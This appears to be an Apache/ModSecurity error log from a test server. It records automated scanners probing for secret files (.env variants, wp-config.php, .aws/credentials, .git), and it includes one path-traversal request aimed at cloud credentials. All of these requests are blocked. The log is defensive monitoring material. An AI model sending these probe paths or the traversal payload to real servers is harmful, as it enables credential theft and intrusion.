[Sun Nov 30 05:10:50.426595 2025] [authz_core:error] [pid 420349] [client 3.108.65.9:53222] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sun Nov 30 05:10:50.782826 2025] [authz_core:error] [pid 421121] [client 3.108.65.9:53236] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sun Nov 30 05:10:51.139249 2025] [authz_core:error] [pid 420133] [client 3.108.65.9:53252] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.ini
[Sun Nov 30 05:10:55.636814 2025] [:error] [pid 420136] [client 3.108.65.9:53360] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSvDz9iFrAxD373c7Pff1QAAAAQ"]
[Sun Nov 30 05:10:55.637071 2025] [:error] [pid 420136] [client 3.108.65.9:53360] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSvDz9iFrAxD373c7Pff1QAAAAQ"]
[Sun Nov 30 05:10:55.637239 2025] [:error] [pid 420136] [client 3.108.65.9:53360] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aSvDz9iFrAxD373c7Pff1QAAAAQ"]
[Sun Nov 30 05:10:55.994218 2025] [authz_core:error] [pid 420351] [client 3.108.65.9:53362] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Sun Nov 30 05:10:56.350550 2025] [:error] [pid 421120] [client 3.108.65.9:36770] [client 3.108.65.9] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSvD0F1RgwzjQxTFQvL8LQAAAAg"]
[Sun Nov 30 05:10:56.350830 2025] [:error] [pid 421120] [client 3.108.65.9:36770] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSvD0F1RgwzjQxTFQvL8LQAAAAg"]
[Sun Nov 30 05:10:56.351105 2025] [:error] [pid 421120] [client 3.108.65.9:36770] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aSvD0F1RgwzjQxTFQvL8LQAAAAg"]
[Sun Nov 30 05:10:56.706583 2025] [:error] [pid 421122] [client 3.108.65.9:36774] [client 3.108.65.9] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSvD0C6tRBnriPIR7Vg46wAAAAw"]
[Sun Nov 30 05:10:56.706809 2025] [:error] [pid 421122] [client 3.108.65.9:36774] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSvD0C6tRBnriPIR7Vg46wAAAAw"]
[Sun Nov 30 05:10:56.706980 2025] [:error] [pid 421122] [client 3.108.65.9:36774] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSvD0C6tRBnriPIR7Vg46wAAAAw"]
[Sun Nov 30 06:09:07.108483 2025] [:error] [pid 420351] [client 204.76.203.25:54548] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvRc-4YmrDb6sVqZeFUCwAAAAc"]
[Sun Nov 30 06:09:07.108768 2025] [:error] [pid 420351] [client 204.76.203.25:54548] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvRc-4YmrDb6sVqZeFUCwAAAAc"]
[Sun Nov 30 06:09:07.108930 2025] [:error] [pid 420351] [client 204.76.203.25:54548] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvRc-4YmrDb6sVqZeFUCwAAAAc"]
[Sun Nov 30 06:37:09.887586 2025] [authz_core:error] [pid 421122] [client 195.178.110.223:60338] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 30 12:32:31.607911 2025] [:error] [pid 427813] [client 195.178.110.68:64782] [client 195.178.110.68] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aSwrT4JQtRtJWnkut4N7BgAAAE4"]
[Sun Nov 30 12:32:31.607982 2025] [:error] [pid 427813] [client 195.178.110.68:64782] [client 195.178.110.68] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aSwrT4JQtRtJWnkut4N7BgAAAE4"]
[Sun Nov 30 12:32:31.608025 2025] [:error] [pid 427813] [client 195.178.110.68:64782] [client 195.178.110.68] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aSwrT4JQtRtJWnkut4N7BgAAAE4"]
[Sun Nov 30 12:32:31.608719 2025] [:error] [pid 427813] [client 195.178.110.68:64782] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aSwrT4JQtRtJWnkut4N7BgAAAE4"]
[Sun Nov 30 12:32:31.608952 2025] [:error] [pid 427813] [client 195.178.110.68:64782] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aSwrT4JQtRtJWnkut4N7BgAAAE4"]
[Sun Nov 30 12:32:34.691528 2025] [:error] [pid 427794] [client 195.178.110.68:56354] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aSwrUmVH58R9wRlXzSwxigAAADs"]
[Sun Nov 30 12:32:34.691745 2025] [:error] [pid 427794] [client 195.178.110.68:56354] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aSwrUmVH58R9wRlXzSwxigAAADs"]
[Sun Nov 30 12:32:34.691941 2025] [:error] [pid 427794] [client 195.178.110.68:56354] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aSwrUmVH58R9wRlXzSwxigAAADs"]
[Sun Nov 30 12:32:42.439465 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSwrWnJWCyvffcL8eFn6tAAAACc"]
[Sun Nov 30 12:32:42.439707 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSwrWnJWCyvffcL8eFn6tAAAACc"]
[Sun Nov 30 12:32:42.439896 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSwrWnJWCyvffcL8eFn6tAAAACc"]
[Sun Nov 30 12:32:43.160297 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tQAAACc"]
[Sun Nov 30 12:32:43.160515 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tQAAACc"]
[Sun Nov 30 12:32:43.160682 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tQAAACc"]
[Sun Nov 30 12:32:43.395409 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrW3-YzzK-2pqhifF31wAAAEU"]
[Sun Nov 30 12:32:43.395653 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrW3-YzzK-2pqhifF31wAAAEU"]
[Sun Nov 30 12:32:43.395852 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSwrW3-YzzK-2pqhifF31wAAAEU"]
[Sun Nov 30 12:32:43.779487 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tgAAACc"]
[Sun Nov 30 12:32:43.779711 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tgAAACc"]
[Sun Nov 30 12:32:43.779898 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSwrW3JWCyvffcL8eFn6tgAAACc"]
[Sun Nov 30 12:32:44.015431 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrXH-YzzK-2pqhifF32AAAAEU"]
[Sun Nov 30 12:32:44.015660 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrXH-YzzK-2pqhifF32AAAAEU"]
[Sun Nov 30 12:32:44.015880 2025] [:error] [pid 427804] [client 195.178.110.68:56346] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrXH-YzzK-2pqhifF32AAAAEU"]
[Sun Nov 30 12:32:44.143456 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSwrXHJWCyvffcL8eFn6twAAACc"]
[Sun Nov 30 12:32:44.143683 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSwrXHJWCyvffcL8eFn6twAAACc"]
[Sun Nov 30 12:32:44.143891 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSwrXHJWCyvffcL8eFn6twAAACc"]
